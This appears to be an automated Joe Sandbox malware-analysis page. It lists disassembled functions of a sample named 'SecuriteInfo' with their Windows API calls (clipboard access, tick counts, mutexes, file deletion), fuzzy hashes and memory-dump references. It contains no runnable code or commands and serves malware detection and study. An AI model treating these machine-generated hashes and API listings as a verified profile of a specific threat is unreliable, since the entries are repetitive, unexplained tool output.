Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseDiskFreeGlobalMessagePeekSpaceUnlockwcsncpy
String ID:
API String ID: 833027430-0
Opcode ID: 1858c4c27d96d342626d686266601d805f3c9d320734116cd528f245b75e8ad1
Instruction ID: 1769304cd294e013a147466cf22cfa870df73598446d64eecaaa0db1985c63e6
Opcode Fuzzy Hash: 1858c4c27d96d342626d686266601d805f3c9d320734116cd528f245b75e8ad1
Instruction Fuzzy Hash: 55816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400374F7 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7a3d10c2a1ed4b693f4f67758080725c93c4dc6d79ecbba6c20d99efebf27a02
Instruction ID: db3ae0595e5153713a6651476717d4381bd72430f3661e7cd645ff1e21dde516
Opcode Fuzzy Hash: 7a3d10c2a1ed4b693f4f67758080725c93c4dc6d79ecbba6c20d99efebf27a02
Instruction Fuzzy Hash: 15816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037690 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065860: _wcstoi64.LIBCMT ref: 00000001400658C8

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
String ID:
API String ID: 3633153638-0
Opcode ID: 27140dc42f31309aa5fb14ee38f0d98c258488d577d5df56b39a339c431268b3
Instruction ID: 28fa9b053f64b7fbc8dd3b4c1d7796df9131d9b8420f4c193e6f24b675bb27bb
Opcode Fuzzy Hash: 27140dc42f31309aa5fb14ee38f0d98c258488d577d5df56b39a339c431268b3
Instruction Fuzzy Hash: 43816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035D86 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 62584500bed59919d3310c89bbda246839bf2e6d243dceb6ac044779de045658
Instruction ID: 78a9af25b59eee165bf2ef1c5bdfe416e83fbf2794bdf6d1147e57b8545cefd6
Opcode Fuzzy Hash: 62584500bed59919d3310c89bbda246839bf2e6d243dceb6ac044779de045658
Instruction Fuzzy Hash: 56816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037FDE Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fcac3cb5afb8eea675416279b75191692d5142a4b385ec4c3534b0be643f3cf3
Instruction ID: 15c9cec44d5503a64e9f50aa99628b35af08039e31313cf9d6babccc29681579
Opcode Fuzzy Hash: fcac3cb5afb8eea675416279b75191692d5142a4b385ec4c3534b0be643f3cf3
Instruction Fuzzy Hash: 0C817132205B4086FB6B8B27E8547EA77A1F74DBE4F540116EB9A876F5CB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038227 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 942c085bff1e9e2ec19b8615e8a4fc9377c2af88fcc5109a856404e525e56bd3
Instruction ID: 255fa19c16cadd1956829ed767789a99a9b6713d57ce744ca11219453cb27e60
Opcode Fuzzy Hash: 942c085bff1e9e2ec19b8615e8a4fc9377c2af88fcc5109a856404e525e56bd3
Instruction Fuzzy Hash: 8C81823260574086FB6B8B27E8547EA37A1F74DBE4F550116EB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038383 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a10425cbddcdfc067869e2f99c229b0b489bd1fdf293c2ecce2ad64b34909482
Instruction ID: 46ae82080e6d2722c06382c461360da3da95cb7602a3fd7566ff8fcdb9634c26
Opcode Fuzzy Hash: a10425cbddcdfc067869e2f99c229b0b489bd1fdf293c2ecce2ad64b34909482
Instruction Fuzzy Hash: 6B816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038627 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 000000014000A840: PostThreadMessageW.USER32 ref: 000000014000A8C1
Part of subcall function 000000014000A840: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000014000A8CE
Part of subcall function 000000014000A840: GetTickCount.KERNEL32 ref: 000000014000A8DE
Part of subcall function 000000014000A840: GetExitCodeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000014000A8FF
Part of subcall function 000000014000A840: GetTickCount.KERNEL32 ref: 000000014000A912
Part of subcall function 000000014000A840: Sleep.KERNEL32 ref: 000000014000A923
Part of subcall function 000000014000A840: CloseHandle.KERNEL32 ref: 000000014000A932
Part of subcall function 000000014000A840: CreateMutexW.KERNEL32 ref: 000000014000A95D
Part of subcall function 000000014000A840: CreateMutexW.KERNEL32 ref: 000000014000A99F

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$CloseCreateMessageMutexSleepThread$ClipboardCodeExitGlobalHandlePeekPostUnlock
String ID:
API String ID: 4035754557-0
Opcode ID: b672400f8117c28a6b1a7ff70a7bbc705aa9f611639b68c0f81ab5e98d7ab052
Instruction ID: 203e0308146d4bcf3db9030e3f41921eb0484e3fa917d430e614d5f8b44563e6
Opcode Fuzzy Hash: b672400f8117c28a6b1a7ff70a7bbc705aa9f611639b68c0f81ab5e98d7ab052
Instruction Fuzzy Hash: 58816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037331 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005E950: GetKeyboardLayout.USER32 ref: 000000014005E978

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalKeyboardLayoutMessagePeekUnlock
String ID:
API String ID: 2243892272-0
Opcode ID: edd75da60a5ec7496a9d8016f1fc62ac6eeb410bc4236d6580506c5501078959
Instruction ID: bf6bafbc4eec3ba63a4bd4b3b761da4afca073a8526ab3d935d6e5352bfabbb9
Opcode Fuzzy Hash: edd75da60a5ec7496a9d8016f1fc62ac6eeb410bc4236d6580506c5501078959
Instruction Fuzzy Hash: 06816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003767C Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e3f3f4a04049e445f937055836e9be217537e9b1830e1cce1cf06cb39e579cd3
Instruction ID: 4a9b01835c314e9a3ba18d6c725d5616d65ab95475d1801a63c950bf1d58588e
Opcode Fuzzy Hash: e3f3f4a04049e445f937055836e9be217537e9b1830e1cce1cf06cb39e579cd3
Instruction Fuzzy Hash: 4C816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400376AB Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140066470: SetLastError.KERNEL32 ref: 00000001400664DA
Part of subcall function 0000000140066470: DeleteFileW.KERNEL32 ref: 00000001400664E3
Part of subcall function 0000000140066470: GetLastError.KERNEL32 ref: 00000001400664EE

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ErrorLast$ClipboardCloseDeleteFileGlobalMessagePeekUnlock
String ID:
API String ID: 3770565981-0
Opcode ID: 272c2640f138618e031d3f936a2da3561c16cd42b8c396dedd32d2e6da0292ac
Instruction ID: 089727375af495d3798bc54dd5fbc52f2806c9aa14155a27d7ad364ebdf95914
Opcode Fuzzy Hash: 272c2640f138618e031d3f936a2da3561c16cd42b8c396dedd32d2e6da0292ac
Instruction Fuzzy Hash: 03816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400376BF Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140080D30: GetFullPathNameW.KERNEL32 ref: 0000000140080D69
Part of subcall function 0000000140080D30: SHFileOperationW.SHELL32 ref: 0000000140080DE1

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileFullGlobalMessageNameOperationPathPeekUnlock
String ID:
API String ID: 1286959346-0
Opcode ID: 28d453a4c1f76abccf10b69cad456417ef7c78d79d6e2abc40cfd15fae3d8dd1
Instruction ID: dca79b81b6ffce34b9c1ace820e9d399f96dda2ad5c1c1b6c27ed24283b25a86
Opcode Fuzzy Hash: 28d453a4c1f76abccf10b69cad456417ef7c78d79d6e2abc40cfd15fae3d8dd1
Instruction Fuzzy Hash: 41816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037AD6 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014007F420: CoInitialize.OLE32 ref: 000000014007F527
Part of subcall function 000000014007F420: CoCreateInstance.OLE32 ref: 000000014007F54B

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseCreateGlobalInitializeInstanceMessagePeekUnlock
String ID:
API String ID: 2299052934-0
Opcode ID: 4ad51f065ecd6a0c46c1aa3ad28ebcf5da51835cee1e7061751f3bbf368cea7b
Instruction ID: 4becf56a522271b2a1cfc175eaf1daa34730be77c28ac9c4aef37f36c445ead3
Opcode Fuzzy Hash: 4ad51f065ecd6a0c46c1aa3ad28ebcf5da51835cee1e7061751f3bbf368cea7b
Instruction Fuzzy Hash: B2815F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037B54 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400570B0: SendMessageW.USER32(?,0000000140037B5E), ref: 0000000140057259

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: ff4cf9b32d15cfd12f0d40df7ae9b342386a6c45fcfcc285a6066610ca7c589c
Instruction ID: 81d14038e6cbdc7634828626ee91e0fa15e542ca7f3486b293df7cd97ec09319
Opcode Fuzzy Hash: ff4cf9b32d15cfd12f0d40df7ae9b342386a6c45fcfcc285a6066610ca7c589c
Instruction Fuzzy Hash: BD816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

